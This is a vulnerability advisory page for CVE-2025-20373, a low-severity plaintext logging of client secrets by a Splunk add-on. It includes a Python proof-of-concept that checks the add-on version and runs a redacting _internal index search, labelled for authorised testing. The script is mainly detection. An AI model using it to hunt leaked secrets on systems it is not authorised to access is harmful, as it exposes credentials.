Security Vulnerability Report
CVE-2025-20373 CVSS 2.7 LOW

CVE-2025-20373

Published: 2025-11-26 18:15:48
Last Modified: 2026-04-15 00:35:42

Description

In Splunk Add-on for Palo Alto Networks versions below 2.0.2, the add-on exposes client secrets in plain text in the _internal index during the addition of new “Data Security Accounts”. The vulnerability would require either local access to the log files or administrative access to internal indexes, which by default only the admin role receives. Review roles and capabilities on your instance and restrict internal index access to administrator-level roles. See [Define roles on the Splunk platform with capabilities](https://docs.splunk.com/Documentation/Splunk/latest/Security/Rolesandcapabilities) in the Splunk documentation for more information.

CVSS Details

CVSS Score
2.7
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Splunk Add-on for Palo Alto Networks < 2.0.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
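# CVE-2025-20373 PoC - Splunk Add-on for Palo Alto Networks Client Secret Exposure
# This PoC demonstrates how to search for exposed client secrets in Splunk _internal index
#
# The script performs two read-only, admin-authenticated REST calls against a
# Splunk instance: a lookup of the installed add-on version and a search over
# the _internal index whose SPL rewrites any client_secret value to [REDACTED]
# before results are returned. It reports only whether matching events exist;
# event contents are never printed.
import json
import os
import requests

# Configuration -- every value can be overridden through the environment so
# that no credential has to be hard-coded in this file. Host/port/user defaults
# match the original script; the password default is deliberately empty and
# the entry point refuses to run without one.
splunk_host = os.environ.get("SPLUNK_HOST", "target-splunk-server")
splunk_port = int(os.environ.get("SPLUNK_PORT", "8089"))
splunk_user = os.environ.get("SPLUNK_USER", "admin")
splunk_password = os.environ.get("SPLUNK_PASSWORD", "")

# TLS verification stays ON unless SPLUNK_VERIFY_TLS=0 is set explicitly. The
# original passed verify=False on every call, which hands the admin credential
# to any on-path host presenting a bogus certificate.
verify_tls = os.environ.get("SPLUNK_VERIFY_TLS", "1") != "0"
# Upper bound, in seconds, on any single REST call (the original GETs had none).
request_timeout = 30

# First add-on version that no longer logs the secret, per the advisory text.
FIXED_VERSION = "2.0.2"
# Display label of the add-on as it appears in /services/apps/local.
ADDON_LABEL = "Splunk Add-on for Palo Alto Networks"


def _base_url() -> str:
    """Return the management-port base URL for the configured instance."""
    return f"https://{splunk_host}:{splunk_port}"


def _version_tuple(version: str) -> tuple:
    """Turn a dotted version string into a comparable tuple of ints.

    Non-numeric segments (for example a trailing "2rc1") are dropped, so
    "2.0.2rc1" compares as (2, 0); an empty string becomes ().
    """
    return tuple(int(part) for part in version.strip().split(".") if part.isdigit())


def _version_below(found: str, threshold: str) -> bool:
    """Return True when *found* sorts strictly before *threshold* numerically."""
    return _version_tuple(found) < _version_tuple(threshold)


def search_exposed_secrets():
    """Run the redacting _internal search and report how many events matched.

    Returns the match count as an int, or None when the search could not be
    run or its response could not be parsed. The SPL itself replaces any
    client_secret value with [REDACTED]; this function only reports the count,
    so secrets are never echoed to the console.
    """
    # Splunk Search Query to find exposed client secrets (SPL kept from the
    # original; the final rex stage masks the secret value in every event).
    search_query = """
index=_internal sourcetype=splunk_web_service "client secret" OR "client_secret" OR "Client Secret"
| search "Data Security" OR "Palo Alto"
| rex mode=sed "s/(client_secret=)([^\\s]+)/\\1[REDACTED]/g"
"""
    print("[*] Searching for exposed client secrets in _internal index...")
    print(f"[*] Query: {search_query}")

    auth = (splunk_user, splunk_password)
    search_payload = {
        "search": search_query,
        "exec_mode": "blocking",  # the POST returns only once the job has finished
        "count": 0,
        "output_mode": "json",  # structured response instead of scraping <sid> from XML
    }
    try:
        response = requests.post(
            f"{_base_url()}/services/search/jobs",
            auth=auth,
            data=search_payload,
            verify=verify_tls,
            timeout=request_timeout,
        )
        if response.status_code != 201:
            print(f"[-] Search failed: {response.status_code}")
            return None
        job_id = response.json()["sid"]
        print(f"[+] Search job created: {job_id}")

        results_response = requests.get(
            f"{_base_url()}/services/search/jobs/{job_id}/results",
            params={"output_mode": "json", "count": 0},
            auth=auth,
            verify=verify_tls,
            timeout=request_timeout,
        )
        if results_response.status_code != 200:
            print(f"[-] Fetching results failed: {results_response.status_code}")
            return None
        matches = len(results_response.json().get("results", []))
    except requests.RequestException as exc:
        print(f"[-] Error: {exc}")
        return None
    except (ValueError, KeyError) as exc:
        # Malformed or non-JSON body, or a 201 without a sid field.
        print(f"[-] Unexpected response format: {exc}")
        return None

    print(f"[+] Search completed. {matches} matching event(s) found in _internal.")
    if matches:
        print("[!] If client secrets appear in plaintext, vulnerability is confirmed")
    else:
        print("[+] No matching events; no secret appears to have been logged.")
    return matches


def verify_vulnerability() -> bool:
    """Return True when the installed add-on reports a version below 2.0.2.

    Looks the add-on up by display label in /services/apps/local and compares
    its "version" field numerically. The original only tested whether the
    substring "version" occurred anywhere in the response, which holds for
    every installed app and so always reported the target as vulnerable.
    """
    try:
        response = requests.get(
            f"{_base_url()}/services/apps/local",
            # count=0 lifts the default page size so the add-on is not missed
            # on instances with many apps.
            params={"output_mode": "json", "count": 0},
            auth=(splunk_user, splunk_password),
            verify=verify_tls,
            timeout=request_timeout,
        )
        if response.status_code != 200:
            print(f"[-] Listing apps failed: {response.status_code}")
            return False
        entries = response.json().get("entry", [])
    except requests.RequestException as exc:
        print(f"[-] Error checking version: {exc}")
        return False
    except ValueError as exc:
        print(f"[-] Unexpected response format: {exc}")
        return False

    for entry in entries:
        content = entry.get("content", {})
        # Substring match mirrors the original's loose matching on the label.
        if ADDON_LABEL not in str(content.get("label", "")):
            continue
        version = str(content.get("version", ""))
        if _version_below(version, FIXED_VERSION):
            print(f"[!] Vulnerable version detected ({version} < {FIXED_VERSION})")
            return True
        print(f"[+] Installed version {version} is not affected")
        return False

    print("[-] Add-on not found in /services/apps/local")
    return False


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-20373 PoC - Splunk Add-on Information Disclosure")
    print("=" * 60)
    if not splunk_password:
        print("[-] SPLUNK_PASSWORD is not set; refusing to send an empty credential")
        raise SystemExit(1)
    if verify_vulnerability():
        search_exposed_secrets()
    else:
        print("[-] Target does not appear to be vulnerable or is already patched")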

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-20373", "sourceIdentifier": "[email protected]", "published": "2025-11-26T18:15:48.137", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "In Splunk Add-on for Palo Alto Networks versions below 2.0.2, the add-on exposes client secrets in plain text in the _internal index during the addition of new “Data Security Accounts“. The vulnerability would require either local access to the log files or administrative access to internal indexes, which by default only the admin role receives. Review roles and capabilities on your instance and restrict internal index access to administrator-level roles. See [Define roles on the Splunk platform with capabilities](https://docs.splunk.com/Documentation/Splunk/latest/Security/Rolesandcapabilities) in the Splunk documentation for more information."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N", "baseScore": 2.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-532"}]}], "references": [{"url": "https://advisory.splunk.com/advisories/SVD-2025-1105", "source": "[email protected]"}]}}